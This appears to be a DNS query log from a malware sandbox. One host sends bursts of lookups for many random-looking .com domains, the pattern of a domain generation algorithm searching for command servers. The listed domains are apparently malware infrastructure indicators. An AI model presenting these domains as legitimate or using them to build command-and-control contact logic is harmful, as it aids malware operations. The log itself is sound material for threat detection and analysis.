                                                                                                                                                                                                            Nov 11, 2024 18:25:25.951702118 CET192.168.2.101.1.1.10xcb74Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.951874971 CET192.168.2.101.1.1.10x2209Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.952179909 CET192.168.2.101.1.1.10xb77fStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.952370882 CET192.168.2.101.1.1.10x47e6Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.952591896 CET192.168.2.101.1.1.10x6685Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.952783108 CET192.168.2.101.1.1.10x139fStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.953282118 CET192.168.2.101.1.1.10x597cStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.953501940 CET192.168.2.101.1.1.10xd5caStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.954456091 CET192.168.2.101.1.1.10x7f80Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.954658031 CET192.168.2.101.1.1.10xca50Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.955096960 CET192.168.2.101.1.1.10xe2c2Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.956304073 CET192.168.2.101.1.1.10xba02Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.959279060 CET192.168.2.101.1.1.10x3b10Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.524036884 CET192.168.2.101.1.1.10x6022Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.564114094 CET192.168.2.101.1.1.10x840Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.573309898 CET192.168.2.101.1.1.10xd6beStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.611366034 CET192.168.2.101.1.1.10xc2bdStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.611594915 CET192.168.2.101.1.1.10x994dStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.612358093 CET192.168.2.101.1.1.10x225Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.613235950 CET192.168.2.101.1.1.10xfef9Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.749855042 CET192.168.2.101.1.1.10xa12dStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.756776094 CET192.168.2.101.1.1.10x1d97Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.757595062 CET192.168.2.101.1.1.10x1df4Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.758702993 CET192.168.2.101.1.1.10xd1a7Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.760173082 CET192.168.2.101.1.1.10x8379Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.765269995 CET192.168.2.101.1.1.10x94fdStandard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.768780947 CET192.168.2.101.1.1.10xcb67Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.782903910 CET192.168.2.101.1.1.10x5a97Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.785365105 CET192.168.2.101.1.1.10xc693Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.803464890 CET192.168.2.101.1.1.10x3009Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.804105043 CET192.168.2.101.1.1.10x64aeStandard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:26.806866884 CET192.168.2.101.1.1.10x7acaStandard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.052512884 CET192.168.2.101.1.1.10xbbfdStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.161530018 CET192.168.2.101.1.1.10x92d5Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.165487051 CET192.168.2.101.1.1.10x4111Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.254542112 CET192.168.2.101.1.1.10x8c2bStandard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.254947901 CET192.168.2.101.1.1.10x998cStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.255747080 CET192.168.2.101.1.1.10x6971Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.256274939 CET192.168.2.101.1.1.10xb89aStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.256349087 CET192.168.2.101.1.1.10x115Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.256793976 CET192.168.2.101.1.1.10xb8c3Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.257227898 CET192.168.2.101.1.1.10x5601Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.257878065 CET192.168.2.101.1.1.10x9b95Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.258162975 CET192.168.2.101.1.1.10x3275Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.258575916 CET192.168.2.101.1.1.10x74e3Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.258913040 CET192.168.2.101.1.1.10x9736Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.259279013 CET192.168.2.101.1.1.10xaf60Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.259363890 CET192.168.2.101.1.1.10xd0b6Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.259706974 CET192.168.2.101.1.1.10x5eedStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.259989023 CET192.168.2.101.1.1.10x10deStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.260123014 CET192.168.2.101.1.1.10x1775Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.260339022 CET192.168.2.101.1.1.10xb5fcStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.260541916 CET192.168.2.101.1.1.10x8ed8Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.260926008 CET192.168.2.101.1.1.10xd7b0Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.261491060 CET192.168.2.101.1.1.10x98cfStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.311398983 CET192.168.2.101.1.1.10xf7beStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.311808109 CET192.168.2.101.1.1.10xa572Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.312171936 CET192.168.2.101.1.1.10xfb69Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.318715096 CET192.168.2.101.1.1.10x5d11Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.319170952 CET192.168.2.101.1.1.10xe503Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.319340944 CET192.168.2.101.1.1.10xb760Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.319678068 CET192.168.2.101.1.1.10xcf91Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.319900990 CET192.168.2.101.1.1.10xfe53Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.320125103 CET192.168.2.101.1.1.10xdbf2Standard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.320765018 CET192.168.2.101.1.1.10x51b1Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.321111917 CET192.168.2.101.1.1.10x8e9fStandard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.327558994 CET192.168.2.101.1.1.10x7f38Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.327959061 CET192.168.2.101.1.1.10x890cStandard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.331244946 CET192.168.2.101.1.1.10xea03Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.331686974 CET192.168.2.101.1.1.10x9739Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.348472118 CET192.168.2.101.1.1.10x29dcStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.372535944 CET192.168.2.101.1.1.10x193dStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.375174046 CET192.168.2.101.1.1.10x8f25Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.375205994 CET192.168.2.101.1.1.10x1664Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.375519991 CET192.168.2.101.1.1.10x64c9Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.375732899 CET192.168.2.101.1.1.10x10eStandard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.376280069 CET192.168.2.101.1.1.10x3d69Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.610853910 CET192.168.2.101.1.1.10x309aStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.613416910 CET192.168.2.101.1.1.10x73f9Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.618988991 CET192.168.2.101.1.1.10x573Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.627599001 CET192.168.2.101.1.1.10xbbeaStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.561889887 CET192.168.2.101.1.1.10x6a69Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.562069893 CET192.168.2.101.1.1.10x33fStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.562226057 CET192.168.2.101.1.1.10x92efStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.564348936 CET192.168.2.101.1.1.10xffaStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.564727068 CET192.168.2.101.1.1.10xc692Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.567209959 CET192.168.2.101.1.1.10x50efStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.567698956 CET192.168.2.101.1.1.10x1ed4Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.568711042 CET192.168.2.101.1.1.10x689eStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.569633007 CET192.168.2.101.1.1.10x35faStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.572679996 CET192.168.2.101.1.1.10xe4acStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.575902939 CET192.168.2.101.1.1.10xeda6Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.892950058 CET192.168.2.101.1.1.10xeeeaStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.893636942 CET192.168.2.101.1.1.10xf1e3Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.905105114 CET192.168.2.101.1.1.10x7fb4Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.910080910 CET192.168.2.101.1.1.10x3fadStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.912800074 CET192.168.2.101.1.1.10xfe1dStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.913652897 CET192.168.2.101.1.1.10xc666Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.913682938 CET192.168.2.101.1.1.10xa9b2Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914361954 CET192.168.2.101.1.1.10x2ef4Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914479971 CET192.168.2.101.1.1.10x5903Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.914877892 CET192.168.2.101.1.1.10x6805Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915008068 CET192.168.2.101.1.1.10x44f5Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915422916 CET192.168.2.101.1.1.10xf0dStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.915882111 CET192.168.2.101.1.1.10xbe20Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.916062117 CET192.168.2.101.1.1.10xe79cStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.916804075 CET192.168.2.101.1.1.10x4dabStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.919644117 CET192.168.2.101.1.1.10xb1feStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.920253992 CET192.168.2.101.1.1.10x33d8Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.920655966 CET192.168.2.101.1.1.10xe349Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921025038 CET192.168.2.101.1.1.10xc352Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921431065 CET192.168.2.101.1.1.10x2455Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.921957970 CET192.168.2.101.1.1.10x369cStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.922494888 CET192.168.2.101.1.1.10x8569Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923000097 CET192.168.2.101.1.1.10xe84dStandard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.923175097 CET192.168.2.101.1.1.10x888Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.942986012 CET192.168.2.101.1.1.10xd39cStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.944993973 CET192.168.2.101.1.1.10x8785Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.945368052 CET192.168.2.101.1.1.10x20ccStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.945663929 CET192.168.2.101.1.1.10xe75Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.946225882 CET192.168.2.101.1.1.10xc7d8Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.946700096 CET192.168.2.101.1.1.10xcdc4Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.947109938 CET192.168.2.101.1.1.10xe2f1Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.947427034 CET192.168.2.101.1.1.10x230bStandard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.948240995 CET192.168.2.101.1.1.10xdfc7Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.970890045 CET192.168.2.101.1.1.10xed7dStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.973419905 CET192.168.2.101.1.1.10x64b5Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.976509094 CET192.168.2.101.1.1.10xe610Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.978744030 CET192.168.2.101.1.1.10x5db8Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.983944893 CET192.168.2.101.1.1.10xef71Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.989768028 CET192.168.2.101.1.1.10xf5f9Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.011392117 CET192.168.2.101.1.1.10x42a8Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.011888981 CET192.168.2.101.1.1.10x5aafStandard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.012005091 CET192.168.2.101.1.1.10xa32dStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.013834000 CET192.168.2.101.1.1.10x2c2cStandard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.013976097 CET192.168.2.101.1.1.10xe63dStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014174938 CET192.168.2.101.1.1.10x69a5Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014194965 CET192.168.2.101.1.1.10x4505Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014410973 CET192.168.2.101.1.1.10xf2e6Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014446974 CET192.168.2.101.1.1.10x129dStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014678955 CET192.168.2.101.1.1.10xe750Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014841080 CET192.168.2.101.1.1.10xe1f7Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.014986992 CET192.168.2.101.1.1.10xb99aStandard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015140057 CET192.168.2.101.1.1.10x9d10Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015579939 CET192.168.2.101.1.1.10x1524Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015753031 CET192.168.2.101.1.1.10x8a5dStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.015902042 CET192.168.2.101.1.1.10xec83Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016112089 CET192.168.2.101.1.1.10xc66aStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016386032 CET192.168.2.101.1.1.10x5cccStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016597986 CET192.168.2.101.1.1.10x2bfcStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016763926 CET192.168.2.101.1.1.10x4740Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.016992092 CET192.168.2.101.1.1.10x2cacStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.017144918 CET192.168.2.101.1.1.10x1449Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.020404100 CET192.168.2.101.1.1.10x9423Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.020607948 CET192.168.2.101.1.1.10x6ebeStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.020816088 CET192.168.2.101.1.1.10xc870Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.160485983 CET192.168.2.101.1.1.10x10b1Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.160531044 CET192.168.2.101.1.1.10x2735Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.162106037 CET192.168.2.101.1.1.10x3b7dStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.172331095 CET192.168.2.101.1.1.10xa3ccStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.178735018 CET192.168.2.101.1.1.10x44c4Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.179179907 CET192.168.2.101.1.1.10x944bStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.189834118 CET192.168.2.101.1.1.10xf68Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.190898895 CET192.168.2.101.1.1.10xa1a6Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.191292048 CET192.168.2.101.1.1.10xfc7aStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.191850901 CET192.168.2.101.1.1.10xf868Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784375906 CET192.168.2.101.1.1.10xa900Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.784569025 CET192.168.2.101.1.1.10xaab0Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.786775112 CET192.168.2.101.1.1.10xc4b3Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.965285063 CET192.168.2.101.1.1.10xe840Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.968156099 CET192.168.2.101.1.1.10x45eStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.969270945 CET192.168.2.101.1.1.10x8736Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.970442057 CET192.168.2.101.1.1.10xf36Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.984575033 CET192.168.2.101.1.1.10xd8e5Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.009614944 CET192.168.2.101.1.1.10x8dd2Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.014250994 CET192.168.2.101.1.1.10x9d05Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.014503002 CET192.168.2.101.1.1.10x818aStandard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.031322002 CET192.168.2.101.1.1.10xfb9Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.033557892 CET192.168.2.101.1.1.10xd1cdStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.148528099 CET192.168.2.101.1.1.10xf4daStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.172677040 CET192.168.2.101.1.1.10x52d4Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:50.199872971 CET192.168.2.101.1.1.10x179Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.197657108 CET192.168.2.101.1.1.10xd833Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:54.197657108 CET192.168.2.101.1.1.10x4f50Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
